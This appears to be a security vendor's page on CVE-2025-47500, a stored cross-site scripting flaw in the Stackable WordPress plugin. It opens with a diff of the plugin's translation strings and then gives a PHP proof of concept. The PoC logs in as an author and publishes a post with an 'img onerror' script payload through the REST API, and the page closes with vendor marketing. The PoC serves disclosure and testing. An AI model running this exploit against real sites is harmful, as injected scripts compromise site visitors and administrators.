+__( 'Scroll', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Visible', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Clear', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Both', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Adjusts the transparency of the entire block', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Z-Index', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets the stack order of different blocks to make one appear in front of another. A block with a higher z-index will show up on top of another block with a lower z-index.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sticky position may not work across all themes', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Static', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Relative', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Absolute', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sticky', 'stackable-ultimate-gutenberg-blocks' );
+__( 'When enabled, the last column will be cloned instead of adding a blank column.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Allow Column Wrapping', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets column paddings, the space inside the block between the block elements and the column container border', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets the distance between two or more columns', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Conditional Display', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Lift', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Scale', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Lift & Scale', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Lift More', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Scale More', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Lift & Scale More', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Hover Effect', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Hover effect', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Triggers animation or effects when you mouse over', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Button Colors', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Min. Button Height', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Button Width', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Button Padding', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Button padding', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Adjusts the space between the button text and button borders', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Button Size & Spacing', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Button Borders & Shadows', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Styles', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Container', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Container Min. Height', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Max Container Width', 'stackable-ultimate-gutenberg-blocks' );
@@ -1099,20 +1012,111 @@
 __( 'Container Background', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Trigger hover state on nested blocks', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Container Borders & Shadow', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Block Width', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Align Wide', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Align Full', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Content Width', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Set the content to be smaller than the block width', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Motion Effects', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Custom CSS', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Shape Color', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Shape Border Radius', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Shape Padding', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Shape Outline Width', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Shape Outline Color', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Icon Shape', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Background Shape', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Select Image', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Image Url', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Aspect Ratio', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Original', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Square 1:1', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Standard 4:3', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Classic 3:2', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Wide 16:9', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Cinematic 2:1', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Ultra Wide 3:1', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Panoramic 4:1', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Portrait 3:4', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Classic Portrait 2:3', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Tall 9:16', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Image width', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Adjusts the image width', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Image height', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Adjusts the image height', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Open Image in Lightbox', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Image Alt', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Show Empty Alt Attribute', 'stackable-ultimat

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-47500 - Stackable <= 3.19.5 - Authenticated (Author+) Stored Cross-Site Scripting
<?php
/**
 * Proof of Concept for CVE-2025-47500
 * Requires valid WordPress author credentials
 * Targets Stackable plugin <= 3.19.5
 */

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'author_user';
$password = 'author_password';

// Payload to inject - basic alert demonstration
$payload = '<img src=x onerror=alert("XSS_via_Stackable")>';

// Initialize cURL session for WordPress login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Check if login succeeded by looking for admin dashboard
if (strpos($response, 'wp-admin') === false) {
    die('Login failed. Check credentials.');
}

// Create a new post with malicious Stackable block
$post_data = [
    'post_title' => 'Test Post with XSS',
    'post_content' => '<!-- wp:stackable/icon-label {"text":"' . $payload . '"} /-->',
    'post_status' => 'publish',
    'post_type' => 'post'
];

// Get nonce for post creation (simplified - real implementation needs nonce from admin page)
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php');
$admin_page = curl_exec($ch);

// Extract nonce from page (this is simplified - actual implementation would parse HTML)
// Note: Real exploitation uses the Gutenberg editor REST API

// Alternative: Use REST API to create post with block content
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-json/wp/v2/posts');
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
$api_response = curl_exec($ch);

$response_data = json_decode($api_response, true);
if (isset($response_data['id'])) {
    echo 'Post created successfully. ID: ' . $response_data['id'] . "n";
    echo 'Visit: ' . $target_url . '/?p=' . $response_data['id'] . "n";
    echo 'Payload injected: ' . $payload . "n";
} else {
    echo 'Failed to create post. Response: ' . $api_response . "n";
}

curl_close($ch);
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School